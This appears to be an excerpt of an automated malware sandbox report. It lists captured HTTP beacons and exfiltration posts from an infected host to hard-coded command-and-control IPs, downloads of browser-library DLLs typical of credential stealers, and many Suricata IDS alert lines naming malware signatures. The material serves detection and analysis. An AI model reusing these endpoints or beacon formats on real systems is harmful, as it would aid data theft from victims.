Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="file"------JJDBAEHIJKJKEBFIEGHI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHDAAKEHJECBFHCBKFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 2d 2d 0d 0a Data Ascii: ------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="file"------AAEHDAAKEHJECBFHCBKF--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49787 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49804 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49806 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49814 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49823 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49831 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49822 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49830 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49832 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49844 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49851 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49837 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49858 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49852 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49875 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49863 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49876 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49872 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49843 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49885 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49897 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49947 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49914 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49980 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50004 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50026 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50060 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50068 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50069 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50096 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50120 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50125 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50134 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50128 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50121 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50140 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50141 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50157 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50162 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50158 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50168 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50169 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50163 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50177 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50178 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50180 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50174 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50185 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50189 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50186 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50205 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50203 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50222 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50238 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50240 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50241 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50242 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50246 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50250 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50253 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50263 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50264 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50254 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50276 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50274 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50247 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50284 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50286 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50292 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50287 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50291 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50298 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50299 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50304 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50517 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50526 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50533 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50527 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50541 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50520 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50523 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50614 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50544 -> 172.67.209.202:443
